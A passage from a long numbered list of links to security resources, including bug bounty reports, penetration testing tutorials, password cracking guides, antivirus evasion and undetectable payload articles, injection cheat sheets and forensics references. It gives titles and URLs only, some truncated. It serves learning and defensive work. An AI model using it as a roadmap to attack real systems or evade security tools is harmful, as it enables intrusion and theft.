sub-domain takeover: https://hackerone.com/reports/175070 -720-Read access to Google: https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/ -721-A Facebook XXE with Word: https://www.bram.us/2014/12/29/how-i-hacked-facebook-with-a-word-document/ -722-The Wikiloc XXE: https://www.davidsopas.com/wikiloc-xxe-vulnerability/ -723-Uber Jinja2 TTSI: https://hackerone.com/reports/125980 -724-Uber Angular template injection: https://hackerone.com/reports/125027 -725-Yahoo Mail stored XSS: https://klikki.fi/adv/yahoo2.html -726-Google image search XSS: https://mahmoudsec.blogspot.com/2015/09/how-i-found-xss-vulnerability-in-google.html -727-Shopify Giftcard Cart XSS : https://hackerone.com/reports/95089 -728-Shopify wholesale XSS : https://hackerone.com/reports/106293 -729-Bypassing the Shopify admin authentication: https://hackerone.com/reports/270981 -730-Starbucks race conditions: https://sakurity.com/blog/2015/05/21/starbucks.html -731-Binary.com vulnerability – stealing a user's money: https://hackerone.com/reports/98247 -732-HackerOne signal manipulation: https://hackerone.com/reports/106305 -733-Shopify S buckets open: https://hackerone.com/reports/98819 -734-HackerOne S buckets open: https://hackerone.com/reports/209223 -735-Bypassing the GitLab 2F authentication: https://gitlab.com/gitlab-org/gitlab-ce/issues/14900 -736-Yahoo PHP info disclosure: https://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/ -737-Shopify for exporting installed users: https://hackerone.com/reports/96470 -738-Shopify Twitter disconnect: https://hackerone.com/reports/111216 -739-Badoo full account takeover: https://hackerone.com/reports/127703 -740-Disabling PS Logging: https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs -741-macro-less-code-exec-in-msword: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ -742-5 ways to Exploiting PUT Vulnerability: http://www.hackingarticles.in/5-ways-to-exploiting-put-vulnerabilit -743-5 Ways to Exploit Verb Tempering Vulnerability: http://www.hackingarticles.in/5-ways-to-exploit-verb-tempering-vulnerability -744-5 Ways to Hack MySQL Login Password: http://www.hackingarticles.in/5-ways-to-hack-mysql-login-password -745-5 Ways to Hack SMB Login Password: http://www.hackingarticles.in/5-ways-to-hack-smb-login-password -746-6 Ways to Hack FTP Login Password: http://www.hackingarticles.in/6-ways-to-hack-ftp-login-password -746-6 Ways to Hack SNMP Password: http://www.hackingarticles.in/6-ways-to-hack-snmp-password -747-6 Ways to Hack VNC Login Password: http://www.hackingarticles.in/6-ways-to-hack-vnc-login-password -748-Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter: http://www.hackingarticles.in/access-sticky-keys-backdoor-remote-pc-sticky-keys-hunter -749-Beginner Guide to IPtables: http://www.hackingarticles.in/beginner-guide-iptables -750-Beginner Guide to impacket Tool kit: http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit -751-Exploit Remote Windows 10 PC using Discover Tool: http://www.hackingarticles.in/exploit-remote-windows-10-pc-using-discover-tool -752-Forensics Investigation of Remote PC (Part 2): http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-2 -753-5 ways to File upload vulnerability Exploitation: http://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation -754-FTP Penetration Testing in Ubuntu (Port 21): http://www.hackingarticles.in/ftp-penetration-testing-in-ubuntu-port-21 -755-FTP Penetration Testing on Windows (Port 21): http://www.hackingarticles.in/ftp-penetration-testing-windows -756-FTP Pivoting through RDP: http://www.hackingarticles.in/ftp-pivoting-rdp -757-Fun with Metasploit Payloads: http://www.hackingarticles.in/fun-metasploit-payloads -758-Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC: http://www.hackingarticles.in/gather-cookies-and-history-of-mozilla-firefox-in-remote-windows-linux-or-mac-pc -759-Generating Reverse Shell using Msfvenom (One Liner Payload): http://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload -760-Generating Scan Reports Using Nmap (Output Scan): http://www.hackingarticles.in/generating-scan-reports-using-nmap-output-scan -761-Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled): http://www.hackingarticles.in/get-meterpreter-session-locked-pc-remotely-remote-desktop-enabled -762-Hack ALL Security Features in Remote Windows 7 PC: http://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc -763-5 ways to Exploit LFi Vulnerability: http://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability -764-5 Ways to Directory Bruteforcing on Web Server: http://www.hackingarticles.in/5-ways-directory-bruteforcing-web-server -765-Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit -766-Hack Gmail and Facebook Password in Network using Bettercap: http://www.hackingarticles.in/hack-gmail-facebook-password-network-using-bettercap -767-ICMP Penetration Testing: http://www.hackingarticles.in/icmp-penetration-testing -768-Understanding Guide to Mimikatz: http://www.hackingarticles.in/understanding-guide-mimikatz -769-5 Ways to Create Dictionary for Bruteforcing: http://www.hackingarticles.in/5-ways-create-dictionary-bruteforcing -770-Linux Privilege Escalation using LD_Preload: http://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/ -771-2 Ways to Hack Remote Desktop Password using kali Linux: http://www.hackingarticles.in/2-ways-to-hack-remote-desktop-password-using-kali-linux -772-2 ways to use Msfvenom Payload with Netcat: http://www.hackingarticles.in/2-ways-use-msfvenom-payload-netcat -773-4 ways to Connect Remote PC using SMB Port: http://www.hackingarticles.in/4-ways-connect-remote-pc-using-smb-port -774-4 Ways to DNS Enumeration: http://www.hackingarticles.in/4-ways-dns-enumeration -775-4 Ways to get Linux Privilege Escalation: http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation -776-101+ OSINT Resources for Investigators [2019]: https://i-sight.com/resources/101-osint-resources-for-investigators/ -777-Week in OSINT #2019–02: https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f -778-OSINT Cheat Sheet: https://hack2interesting.com/osint-cheat-sheet/ -779-OSINT Cheat Sheet: https://infoskirmish.com/osint-cheat-sheet/ -780-OSINT Links for Investigators: https://i-sight.com/resources/osint-links-for-investigators/ -781- Metasploit Cheat Sheet : https://www.kitploit.com/2019/02/metasploit-cheat-sheet.html -782- Exploit Development Cheat Sheet: https://github.com/coreb1t/awesome-pentest-cheat-sheets/commit/5b83fa9cfb05f4774eb5e1be2cde8dbb04d011f4 -783-Building Profiles for a Social Engineering Attack: https://pentestlab.blog/2012/04/19/building-profiles-for-a-social-engineering-attack/ -784-Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes): https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html -785-Getting the goods with CrackMapExec: Part 2: https://byt3bl33d3r.github.io/tag/crackmapexec.html -786-Bug Hunting Methodology (part-1): https://medium.com/p/91295b2d2066 -787-Exploring Cobalt Strike's ExternalC2 framework: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/ -788-Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities: https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/ -789-Adversarial Tactics, Techniques & Common Knowledge: https://attack.mitre.org/wiki/Main_Page -790-Bug Bounty — Tips / Tricks / JS (JavaScript Files): https://medium.com/p/bdde412ea49d -791-Bug Bounty Hunting Tips #2 —Target their mobile apps (Android Edition): https://medium.com/p/f88a9f383fcc -792-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -793-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -794-ClickOnce (Twice or Thrice): A Technique for Social Engineering and (Un)trusted Command Execution: https://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/ -795-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2): https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -796-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -797-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation: https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/ -798-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -799-Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ -800-Capcom Rootkit Proof-Of-Concept: https://www.fuzzysecurity.com/tutorials/28.html -801-Linux Privilege Escalation using Misconfigured NFS: http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ -802-Beginners Guide for John the Ripper (Part 1): http://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/ -803-Working of Traceroute using Wireshark: http://www.hackingarticles.in/working-of-traceroute-using-wireshark/ -804-Multiple Ways to Get root through Writable File: http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/ -805-4 ways to SMTP Enumeration: http://www.hackingarticles.in/4-ways-smtp-enumeration -806-4 ways to Hack MS SQL Login Password: http://www.hackingarticles.in/4-ways-to-hack-ms-sql-login-password -807-4 Ways to Hack Telnet Passsword: http://www.hackingarticles.in/4-ways-to-hack-telnet-passsword -808-5 ways to Brute Force Attack on WordPress Website: http://www.hackingarticles.in/5-ways-brute-force-attack-wordpress-website -809-5 Ways to Crawl a Website: http://www.hackingarticles.in/5-ways-crawl-website -810-Local Linux Enumeration & Privilege Escalation Cheatsheet: https://www.rebootuser.com/?p=1623 -811-The Drebin Dataset: https://www.sec.cs.tu-bs.de/~danarp/drebin/download.html -812-ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else: https://www.slideshare.net/x00mario/es6-en -813-IT and Information Security Cheat Sheets: https://zeltser.com/cheat-sheets/ -814-Cheat Sheets - DFIR Training: https://www.dfir.training/cheat-sheets -815-WinDbg Malware Analysis Cheat Sheet: https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/ -819-Cheat Sheet for Analyzing Malicious Software: https://www.prodefence.org/cheat-sheet-for-analyzing-malicious-software/ -820-Analyzing Malicious Documents Cheat Sheet - Prodefence: https://www.prodefence.org/analyzing-malicious-documents-cheat-sheet-2/ -821-Cheat Sheets - SANS Digital Forensics: https://digital-forensics.sans.org/community/cheat-sheets -822-Linux Command Line Forensics and Intrusion Detection Cheat Sheet: https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/ -823-Windows Registry Auditing Cheat Sheet: https://www.slideshare.net/Hackerhurricane/windows-registry-auditing-cheat-sheet-ver-jan-2016-malwarearchaeology -824-Cheat Sheet of Useful Commands Every Kali Linux User Needs To Know: https://kennyvn.com/cheatsheet-useful-bash-commands-linux/ -825-kali-linux-cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -826-8 Best Kali Linux Terminal Commands used by Hackers (2019 Edition): https://securedyou.com/best-kali-linux-commands-terminal-hacking/ -827-Kali Linux Commands Cheat Sheet: https://www.pinterest.com/pin/393431717429496576/ -827-Kali Linux Commands Cheat Sheet A To Z: https://officialhacker.com/linux-commands-cheat-sheet/ -828-Linux commands CHEATSHEET for HACKERS: https://www.reddit.com/r/Kalilinux/.../linux_commands_cheatsheet_for_hackers/ -829-100 Linux Commands – A Brief Outline With Cheatsheet: https://fosslovers.com/100-linux-commands-cheatsheet/ -830-Kali Linux – Penetration Testing Cheat Sheet: https://uwnthesis.wordpress.com/2016/06/.../kali-linux-penetration-testing-cheat-sheet/ -831-Basic Linux Terminal Shortcuts Cheat Sheet : https://computingforgeeks.com/basic-linux-terminal-shortcuts-cheat-sheet/ -832-List Of 220+ Kali Linux and Linux Commands Line {Free PDF} : https://itechhacks.com/kali-linux-and-linux-commands/ -833-Transferring files from Kali to Windows (post exploitation): https://blog.ropnop.com/transferring-files-from-kali-to-windows/ -834-The Ultimate Penetration Testing Command Cheat Sheet for Kali Linux: https://www.hostingland.com/.../the-ultimate-penetration-testing-command-cheat-sheet -835-What is penetration testing? 10 hacking tools the pros use: https://www.csoonline.com/article/.../17-penetration-testing-tools-the-pros-use.html -836-Best Hacking Tools List for Hackers & Security Professionals in 2019: https://gbhackers.com/hacking-tools-list/ -837-ExploitedBunker PenTest Cheatsheet: https://exploitedbunker.com/articles/pentest-cheatsheet/ -838-How to use Zarp for penetration testing: https://www.techrepublic.com/article/how-to-use-zarp-for-penetration-testing/ -839-Wireless Penetration Testing Cheat Sheet; https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/ -840-Pentest Cheat Sheets: https://www.cheatography.com/tag/pentest/ -841-40 Best Penetration Testing (Pen Testing) Tools in 2019: https://www.guru99.com/top-5-penetration-testing-tools.html -842-Metasploit Cheat Sheet: https://www.hacking.land/2019/02/metasploit-cheat-sheet.html -843-OSCP useful resources and tools; https://acknak.fr/en/articles/oscp-tools/ -844-Pentest + Exploit dev Cheatsheet: https://ehackings.com/all-posts/pentest-exploit-dev-cheatsheet/ -845-What is Penetration Testing? A Quick Guide for 2019: https://www.cloudwards.net/penetration-testing/ -846-Recon resource: https://pentester.land/cheatsheets/2019/04/15/recon-resources.html -847-Network Recon Cheat Sheet: https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/ -848-Recon Cheat Sheets: https://www.cheatography.com/tag/recon/ -849-Penetration Testing Active Directory, Part II: https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/ -850-Reverse-engineering Cheat Sheets: https://www.cheatography.com/tag/reverse-engineering/ -851-Reverse Engineering Cheat Sheet: https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet -852-ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS: https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows -853-PROPagate: http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/ -854-Process Doppelgänging, by Tal Liberman and Eugene Kogan:: https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf -855-Gargoyle: https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html -856-GHOSTHOOK: https://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/ -857-Learn C: https://www.programiz.com/c-programming -858-x86 Assembly Programming Tutorial: https://www.tutorialspoint.com/assembly_programming/ -859-Dr. Paul Carter's PC Assembly Language: http://pacman128.github.io/pcasm/ -860-Introductory Intel x86 - Architecture, Assembly, Applications, and Alliteration: http://opensecuritytraining.info/IntroX86.html -861-x86 Disassembly: https://en.wikibooks.org/wiki/X86_Disassembly -862-use-of-dns-tunneling-for-cc-communications-malware: https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/ -863-Using IDAPython to Make Your Life Easier (Series):: https://researchcenter.paloaltonetworks.com/2015/12/using-idapython-to-make-your-life-easier-part-1/ -864-NET binary analysis: https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials/ -865-detailed analysis of the BlackEnergy3 big dropper: https://cysinfo.com/blackout-memory-analysis-of-blackenergy-big-dropper/ -866-detailed analysis of Uroburos rootkit: https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg -867-TCP/IP and tcpdump Pocket Reference Guide: https://www.sans.org/security-resources/tcpip.pdf -868-TCPDUMP Cheatsheet: http://packetlife.net/media/library/12/tcpdump.pdf -869-Scapy Cheatsheet: http://packetlife.net/media/library/36/scapy.pdf -870-WIRESHARK DISPLAY FILTERS: http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf -871-Windows command line sheet: https://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf -872-Metasploit cheat sheet: https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf -873-IPv6 Cheatsheet: http://packetlife.net/media/library/8/IPv6.pdf -874-IPv4 Subnetting: http://packetlife.net/media/library/15/IPv4_Subnetting.pdf -875-IOS IPV4 ACCESS LISTS: http://packetlife.net/media/library/14/IOS_IPv4_Access_Lists.pdf -876-Common Ports List: http://packetlife.net/media/library/23/common_ports.pdf -877-WLAN: http://packetlife.net/media/library/4/IEEE_802.11_WLAN.pdf -878-VLANs Cheatsheet: http://packetlife.net/media/library/20/VLANs.pdf -879-VoIP Basics CheatSheet: http://packetlife.net/media/library/34/VOIP_Basics.pdf -880-Google hacking and defense cheat sheet: https://www.sans.org/security-resources/GoogleCheatSheet.pdf -881-Nmap CheatSheet: https://pen-testing.sans.org/blog/2013/10/08/nmap-cheat-sheet-1-0 -882-Netcat cheat sheet: https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf -883-PowerShell cheat sheet: https://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf -884-Scapy cheat sheet POCKET REFERENCE: https://blogs.sans.org/pen-testing/files/2016/04/ScapyCheatSheet_v0.2.pdf -885-SQL injection cheat sheet.: https://information.rapid7.com/sql-injection-cheat-sheet-download.html -886-Injection cheat sheet: https://information.rapid7.com/injection-non-sql-cheat-sheet-download.html -887-Symmetric Encryption Algorithms cheat sheet: https://www.cheatography.com/rubberdragonfarts/cheat-sheets/symmetric-encryption-algorithms/ -888-Intrusion Discovery Cheat Sheet v2.0 for Linux: https://pen-testing.sans.org/retrieve/linux-cheat-sheet.pdf -889-Intrusion Discovery Cheat Sheet v2.0 for Window: https://pen-testing.sans.org/retrieve/windows-cheat-sheet.pdf -890-Memory Forensics Cheat Sheet v1.2: https://digital-forensics.sans.org/media/memory-forensics-cheat-sheet.pdf -891-CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS G E N E R AL APPROACH: https://www.sans.org/brochure/course/log-management-in-depth/6 -892-Evidence collection cheat sheet: https://digital-forensics.sans.org/media/evidence_collection_cheat_sheet.pdf -893-Hex file and regex cheat sheet v1.0: https://digital-forensics.sans.org/media/hex_file_and_regex_cheat_sheet.pdf -894-Rekall Memory Forensic Framework Cheat Sheet v1.2.: https://digital-forensics.sans.org/media/rekall-memory-forensics-cheatsheet.pdf -895-SIFT WORKSTATION Cheat Sheet v3.0.: https://digital-forensics.sans.org/media/sift_cheat_sheet.pdf -896-Volatility Memory Forensic Framework Cheat Sheet: https://digital-forensics.sans.org/media/volatility-memory-forensics-cheat-sheet.pdf -897-Hands - on Network Forensics.: https://www.first.org/resources/papers/conf2015/first_2015_-_hjelmvik-_erik_-_hands-on_network_forensics_20150604.pdf -898-VoIP Security Vulnerabilities.: https://www.sans.org/reading-room/whitepapers/voip/voip-security-vulnerabilities-2036 -899-Incident Response: How to Fight Back: https://www.sans.org/reading-room/whitepapers/analyst/incident-response-fight-35342 -900-BI-7_VoIP_Analysis_Fundamentals: https://sharkfest.wireshark.org/sharkfest.12/presentations/BI-7_VoIP_Analysis_Fundamentals.pdf -901-Bug Hunting Guide: cybertheta.blogspot.com/2018/08/bug-hunting-guide.html -902-Guide 001 |Getting Started in Bug Bounty Hunting: https://whoami.securitybreached.org/2019/.../guide-getting-started-in-bug-bounty-hun... -903-SQL injection cheat sheet : https://portswigger.net › Web Security Academy › SQL injection › Cheat sheet -904-RSnake's XSS Cheat Sheet: https://www.in-secure.org/2018/08/22/rsnakes-xss-cheat-sheet/ -905-Bug Bounty Tips (2): https://ctrsec.io/index.php/2019/03/20/bug-bounty-tips-2/ -906-A Review of my Bug Hunting Journey: https://kongwenbin.com/a-review-of-my-bug-hunting-journey/ -907-Meet the First Hacker Millionaire on HackerOne: https://itblogr.com/meet-the-first-hacker-millionaire-on-hackerone/ -908-XSS Cheat Sheet: https://www.reddit.com/r/programming/comments/4sn54s/xss_cheat_sheet/ -909-Bug Bounty Hunter Methodology: https://www.slideshare.net/bugcrowd/bug-bounty-hunter-methodology-nullcon-2016 -910-#10 Rules of Bug Bounty: https://hackernoon.com/10-rules-of-bug-bounty-65082473ab8c -911-Bugbounty Checklist: https://www.excis3.be/bugbounty-checklist/21/ -912-FireBounty | The Ultimate Bug Bounty List!: https://firebounty.com/ -913-Brutelogic xss cheat sheet 2019: https://brutelogic.com.br/blog/ebook/xss-cheat-sheet/ -914-XSS Cheat Sheet by Rodolfo Assis: https://leanpub.com/xss -915-Cross-Site-Scripting (XSS) – Cheat Sheet: https://ironhackers.es/en/cheatsheet/cross-site-scripting-xss-cheat-sheet/ -916-XSS Cheat Sheet V. 2018 : https://hackerconnected.wordpress.com/2018/03/15/xss-cheat-sheet-v-2018/ -917-Cross-site Scripting Payloads Cheat Sheet : https://exploit.linuxsec.org/xss-payloads-list -918-Xss Cheat Sheet : https://www.in-secure.org/tag/xss-cheat-sheet/ -919-Open Redirect Cheat Sheet : https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html -920-XSS, SQL Injection and Fuzzing Bar Code Cheat Sheet: https://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php -921-XSS Cheat Sheet: https://tools.paco.bg/13/ -922-XSS for ASP.net developers: https://www.gosecure.net/blog/2016/03/22/xss-for-asp-net-developers -923-Cross-Site Request Forgery Cheat Sheet: https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/ -924-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens: https://www.acunetix.com/websitesecurity/csrf-attacks/ -925-Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet : https://mamchenkov.net/.../05/.../cross-site-request-forgery-csrf-prevention-cheat-shee... -926-Guide to CSRF (Cross-Site Request Forgery): https://www.veracode.com/security/csrf -927-Cross-site Request Forgery - Exploitation & Prevention: https://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/ -928-SQL Injection Cheat Sheet : https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ -929-MySQL SQL Injection Practical Cheat Sheet: https://www.perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/ -930-SQL Injection (SQLi) - Cheat Sheet, Attack Examples & Protection: https://www.checkmarx.com/knowledge/knowledgebase/SQLi -931-SQL injection attacks: A cheat sheet for business pros: https://www.techrepublic.com/.../sql-injection-attacks-a-cheat-sheet-for-business-pros/ -932-The SQL Injection Cheat Sheet: https://biztechmagazine.com/article/.../guide-combatting-sql-injection-attacks-perfcon -933-SQL Injection Cheat Sheet: https://resources.infosecinstitute.com/sql-injection-cheat-sheet/ -934-Comprehensive SQL Injection Cheat Sheet: https://www.darknet.org.uk/2007/05/comprehensive-sql-injection-cheat-sheet/ -935-MySQL SQL Injection Cheat Sheet: pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet -936-SQL Injection Cheat Sheet: MySQL: https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mysql/ -937- MySQL Injection Cheat Sheet: https://www.asafety.fr/mysql-injection-cheat-sheet/ -938-SQL Injection Cheat Sheet: https://www.reddit.com/r/netsec/comments/7l449h/sql_injection_cheat_sheet/ -939-Google dorks cheat sheet 2019: https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019 -940-Command Injection Cheatsheet : https://hackersonlineclub.com/command-injection-cheatsheet/ -941-OS Command Injection Vulnerability: https://www.immuniweb.com/vulnerability/os-command-injection.html -942-OS Command Injection: https://www.checkmarx.com/knowledge/knowledgebase/OS-Command_Injection -943-Command Injection: The Good, the Bad and the Blind: https://www.gracefulsecurity.com/command-injection-the-good-the-bad-and-the-blind/ -944-OS command injection: https://portswigger.net › Web Security Academy › OS command injection -945-How to Test for Command Injection: https://blog.securityinnovation.com/blog/.../how-to-test-for-command-injection.html -946-Data Exfiltration via Blind OS Command Injection: https://www.contextis.com/en/blog/data-exfiltration-via-blind-os-command-injection -947-XXE Cheatsheet: https://www.gracefulsecurity.com/xxe-cheatsheet/ -948-bugbounty-cheatsheet/xxe.: https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md -949-XXE - Information Security: https://phonexicum.github.io/infosec/xxe.html -950-XXE Cheat Sheet: https://www.hahwul.com/p/xxe-cheat-sheet.html -951-Advice From A Researcher: Hunting XXE For Fun and Profit: https://www.bugcrowd.com/blog/advice-from-a-bug-hunter-xxe/ -952-Out of Band Exploitation (OOB) CheatSheet : https://www.notsosecure.com/oob-exploitation-cheatsheet/ -953-Web app penentration testing checklist and cheatsheet: www.malwrforensics.com/.../web-app-penentration-testing-checklist-and-cheatsheet-with-example -954-Useful Resources: https://lsdsecurity.com/useful-resources/ -955-Exploiting XXE Vulnerabilities in IIS/.NET: https://pen-testing.sans.org/.../entity-inception-exploiting-iis-net-with-xxe-vulnerabiliti... -956-Top 65 OWASP Cheat Sheet Collections - ALL IN ONE: https://www.yeahhub.com/top-65-owasp-cheat-sheet-collections-all-in-one/ -957-Hacking Resources: https://www.torontowebsitedeveloper.com/hacking-resources -958-Out of Band XML External Entity Injection: https://www.netsparker.com/web...scanner/.../out-of-band-xml-external-entity-injectio... -959-XXE - ZeroSec - Adventures In Information Security: https://blog.zsec.uk/out-of-band-xxe-2/ -960-Blog - Automated Data Exfiltration with XXE: https://blog.gdssecurity.com/labs/2015/4/.../automated-data-exfiltration-with-xxe.html -961-My Experience during Infosec Interviews: https://medium.com/.../my-experience-during-infosec-interviews-ed1f74ce41b8 -962-Top 10 Security Risks on the Web (OWASP): https://sensedia.com/.../top-10-security-risks-on-the-web-owasp-and-how-to-mitigate-t... -963-Antivirus Evasion Tools [Updated 2019] : https://resources.infosecinstitute.com/antivirus-evasion-tools/ -964-Adventures in Anti-Virus Evasion: https://www.gracefulsecurity.com/anti-virus-evasion/ -965-Antivirus Bypass Phantom Evasion - 2019 : https://www.reddit.com/r/Kalilinux/.../antivirus_bypass_phantom_evasion_2019/ -966-Antivirus Evasion with Python: https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1 -967-Windows oneliners to get shell: https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/ -968-Does Veil Evasion Still Work Against Modern AntiVirus?: https://www.hackingloops.com/veil-evasion-virustotal/ -969-Google dorks cheat sheet 2019 : https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019 -970-Malware Evasion Techniques : https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques -971-How to become a cybersecurity pro: A cheat sheet: https://www.techrepublic.com/article/cheat-sheet-how-to-become-a-cybersecurity-pro/ -972-Bypassing Antivirus With Ten Lines of Code: https://hackingandsecurity.blogspot.com/.../bypassing-antivirus-with-ten-lines-of.html -973-Bypassing antivirus detection on a PDF exploit: https://www.digital.security/en/blog/bypassing-antivirus-detection-pdf-exploit -974-Generating Payloads & Anti-Virus Bypass Methods: https://uceka.com/2014/02/19/generating-payloads-anti-virus-bypass-methods/ -975-Apkwash Android Antivirus Evasion For Msfvemon: https://hackingarise.com/apkwash-android-antivirus-evasion-for-msfvemon/ -976-Penetration Testing with Windows Computer & Bypassing an Antivirus: https://www.prodefence.org/penetration-testing-with-windows-computer-bypassing-antivirus -978-Penetration Testing: The Quest For Fully UnDetectable Malware: https://www.foregenix.com/.../penetration-testing-the-quest-for-fully-undetectable-malware -979-AVET: An AntiVirus Bypassing tool working with Metasploit Framework : https://githacktools.blogspot.com -980-Creating an undetectable payload using Veil-Evasion Toolkit: https://www.yeahhub.com/creating-undetectable-payload-using-veil-evasion-toolkit/ -981-Evading Antivirus : https://sathisharthars.com/tag/evading-antivirus/ -982-AVPASS – All things in moderation: https://hydrasky.com/mobile-security/avpass/ -983-Complete Penetration Testing & Hacking Tools List: https://cybarrior.com/blog/2019/03/31/hacking-tools-list/ -984-Modern red teaming: 21 resources for your security team: https://techbeacon.com/security/modern-red-teaming-21-resources-your-security-team -985-BloodHound and CypherDog Cheatsheet : https://hausec.com/2019/04/15/bloodhound-and-cypherdog-cheatsheet/ -986-Redteam Archives: https://ethicalhackingguru.com/category/redteam/ -987-NMAP Commands Cheat Sheet: https://www.networkstraining.com/nmap-commands-cheat-sheet/ -988-Nmap Cheat Sheet: https://dhound.io/blog/nmap-cheatsheet -989-Nmap Cheat Sheet: From Discovery to Exploits: https://resources.infosecinstitute.com/nmap-cheat-sheet/ -990-Nmap Cheat Sheet and Pro Tips: https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/ -991-Nmap Tutorial: from the Basics to Advanced Tips: https://hackertarget.com/nmap-tutorial/ -992-How to run a complete network scan with OpenVAS; https://www.techrepublic.com/.../how-to-run-a-complete-network-scan-with-openvas/ -993-Nmap: my own cheatsheet: https://www.andreafortuna.org/2018/03/12/nmap-my-own-cheatsheet/ -994-Top 32 Nmap Command Examples For Linux Sys/Network Admins: https://www.cyberciti.biz/security/nmap-command-examples-tutorials/ -995-35+ Best Free NMap Tutorials and Courses to Become Pro Hacker: https://www.fromdev.com/2019/01/best-free-nmap-tutorials-courses.html -996-Scanning Tools: https://widesecurity.net/kali-linux/kali-linux-tools-scanning/ -997-Nmap - Cheatsheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/nmap/cheatsheet/ -998-Linux for Network Engineers: https://netbeez.net/blog/linux-how-to-use-nmap/ -999-Nmap Cheat Sheet: https://www.hackingloops.com/nmap-cheat-sheet-port-scanning-basics-ethical-hackers/ -1000-Tactical 